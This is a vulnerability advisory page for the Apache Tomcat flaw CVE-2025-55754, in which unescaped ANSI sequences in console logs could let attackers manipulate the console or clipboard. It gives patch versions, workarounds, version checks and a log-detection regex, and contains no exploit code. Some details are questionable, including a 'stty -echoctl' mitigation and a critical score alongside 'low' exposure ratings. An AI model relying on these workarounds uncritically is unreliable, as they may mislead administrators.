CVE-2025-55754 – Apache Tomcat fails to escape ANSI escape seque... (How to Fix)

Q: What is the severity of CVE-2025-55754?

CVE-2025-55754 has a CVSS score of 9.6 (CRITICAL). Apache Tomcat fails to escape ANSI escape sequences in log messages, allowing attackers to inject malicious sequences when Tomcat runs in a console supporting ANSI escape sequences (primarily Windows). This could manipulate the console/clipboard to trick administrators into executing attacker-controlled commands. Affects Tomcat versions 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.40 through 9.0.108, and some EOL versions.

📋 TL;DR

Apache Tomcat fails to escape ANSI escape sequences in log messages, allowing attackers to inject malicious sequences when Tomcat runs in a console supporting ANSI escape sequences (primarily Windows). This could manipulate the console/clipboard to trick administrators into executing attacker-controlled commands. Affects Tomcat versions 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.40 through 9.0.108, and some EOL versions.

💻 Affected Systems

Products:

Apache Tomcat

Versions: 11.0.0-M1 through 11.0.10, 10.1.0-M1 through 10.1.44, 9.0.40 through 9.0.108, plus EOL versions 8.5.60 through 8.5.100

Operating Systems: Primarily Windows with ANSI-enabled consoles; potentially other OS with similar console support

Default Config Vulnerable: ⚠️ Yes

Notes: Only exploitable when Tomcat runs in a console that supports ANSI escape sequences and logs contain attacker-controlled input.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator executes malicious command via clipboard manipulation or console spoofing, leading to full system compromise.

🟠

Likely Case

Limited impact due to specific console requirements and lack of proven attack vector; primarily a defense-in-depth issue.

🟢

If Mitigated

No impact if Tomcat runs without console access or on systems without ANSI escape sequence support.

🌐 Internet-Facing: LOW - Requires console access and specific conditions; no direct remote exploitation vector identified.

🏢 Internal Only: MEDIUM - Internal attackers with access to Tomcat logs/console could attempt social engineering attacks.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: NO

Unauthenticated Exploit: ✅ No

Complexity: HIGH

No proven attack vector exists; exploitation requires specific console conditions and social engineering.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 11.0.11+, 10.1.45+, 9.0.109+

Vendor Advisory: https://lists.apache.org/thread/j7w54hqbkfcn0xb9xy0wnx8w5nymcbqd

Restart Required: Yes

Instructions:

1. Download patched Tomcat version from Apache website. 2. Stop Tomcat service. 3. Backup configuration files. 4. Replace Tomcat installation with patched version. 5. Restore configuration files. 6. Restart Tomcat service.

🔧 Temporary Workarounds

Disable console ANSI support

all

Configure console/terminal to disable ANSI escape sequence interpretation

Windows: Set registry key HKCU\Console\VirtualTerminalLevel to 0
Linux: Set TERM=dumb or use 'stty -echoctl'

Redirect logs away from console

all

Configure Tomcat to log to files only, not console output

Edit logging.properties: set handlers = java.util.logging.FileHandler
Configure log4j/logback to file appenders only

🧯 If You Can't Patch

Run Tomcat as service without console access (Windows service/Linux systemd)
Implement strict access controls to Tomcat console/logs

🔍 How to Verify

Check if Vulnerable:

Check Tomcat version with 'catalina.sh version' or examine server startup logs for version string

Check Version:

Linux: ./catalina.sh version | grep 'Server version'; Windows: catalina.bat version | findstr 'Server version'

Verify Fix Applied:

Confirm version is 11.0.11+, 10.1.45+, or 9.0.109+ using version check command

📡 Detection & Monitoring

Log Indicators:

Unusual ANSI escape sequences in Tomcat logs (patterns starting with ESC[)
Suspicious URLs containing escape character sequences

Network Indicators:

No network-based indicators as this is a local console vulnerability

SIEM Query:

source="tomcat.logs" AND message MATCHES "\\x1b\\[[0-9;]*[a-zA-Z]"

📊 Metadata

CVE ID: CVE-2025-55754

CVSS v3 Score: 9.6 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE: CWE-150

EPSS Score: 0.08% exploit probability (22.7th percentile)

Published: October 27, 2025

Last Updated: November 14, 2025

🔗 References

https://lists.apache.org/thread/j7w54hqbkfcn0xb9xy0wnx8w5nymcbqd Mailing List,Vendor Advisory
http://www.openwall.com/lists/oss-security/2025/10/27/5 Mailing List,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-55754, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Tomcat by Apache

Tomcat by Apache

Tomcat by Apache

Tomcat by Apache

Tomcat by Apache

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Disable console ANSI support

Redirect logs away from console

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities